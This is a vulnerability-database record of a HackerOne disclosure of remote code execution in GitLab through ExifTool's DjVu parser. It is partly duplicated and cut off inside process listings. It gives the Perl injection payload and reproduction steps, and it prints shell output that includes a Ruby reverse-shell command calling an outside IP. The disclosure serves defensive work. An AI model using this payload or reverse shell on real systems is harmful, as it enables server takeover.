-w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T02:40:54", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T01:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T01:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ5LLGF337%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T024054Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEG4aCXVzLXdlc3QtMiJGMEQCIDbkcMm57VBkcl2zixT%2B%2FoQaAeKTwjmiswHd%2FCZfAMgIAiAakfiV017ZA1FYDLRZEFI69wwlgHSm1eNMlYkiAVPimiqDBAj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAIaDDAxMzYxOTI3NDg0OSIMf1cjMUk7TOY7m%2BK1KtcDDesCAZOvOJ440Ek8XtxDi6kKvQs68VCADpoKnvLHCpoHwVJSV%2FYLyD%2FzHqR%2B1yCRyyCuxrgGkf6xtFMVXDNWDwESwb5vSIeq6WHY0YWqOYcVWg7gr6ST%2Fli9gBBzsgm4F1n8Tf5OArgfMMmsQP9NF8caD4InJTY8dVMTq5NYyxL6zP4VjSx8VvULDjlbcPbc%2FZKCgXrj0oa9LhWUQ17jcW1z%2BJyjmIwR3o0xPhGEQEdnqNCQod7X89RpYm8gyvwafz4bULj98UzwDqg4SPN2jcRrm5uXTavTJZHGKlKq9SaHZz9j43OCwkpzmql9jRW4JStqOwzraqhT1SO9SBMPKloDN29WpPQxjDqJ0hl9CnyKKNzefw3YSC7erF0NUQ5GxTd24kBQYD4pOdnxXePDXInWWeCDDBiz50ThfxiLfCcA%2BuL008x8jNhB%2B9xUShDPCi2zyGbJzkpitFaR0nHKoSs5WiDBCT3Hw7g9ef08aFnwCKQhq9dFnsgedqoPLo81q0IidrSs3Cq0pDRlQeQtP4wVMUoz1%2FAZ1yVY1WRVwFqQXZt2zqz3fHHbzdfNyrBZUHnmgEg9jj%2BmaVJEu2L%2FpFLrapb4G5fi3TSvJ4nGW%2FKJpOS8KX8FMKLo%2B4QGOqYBLiw3fGk0OwprKuayd91srQXgjFCgsQh9V6eyzruSMJSx8BJhg8Jfj16W4YRF%2B4MpqC0jn4SEQ7%2F4VrE9XVr5eRYG8HEQvH2NiWmY8Iali39EBYOW%2FAn2d64OmGWW6Vx9bUWz6R3dLMvO97a9LUfZ4S7uvq37QrRTH85aUdgzQPW0ij9mosEbkJou0B6KnA4RKF9NbOA%2Bq%2B3KiB6bXAhM9YarUaF%2FTw%3D%3D&X-Amz-Signature=92bc2aa1b961ff8740ccae8f9209044ad955d4303bb9a975ab209a2f7478333e"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T02:40:54", "differentElements": ["h1reporter"], "edition": 7}, {"bulletin": {"id": "H1:1154542", "hash": "e99d50f1d085e594afd3239977187ec9", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 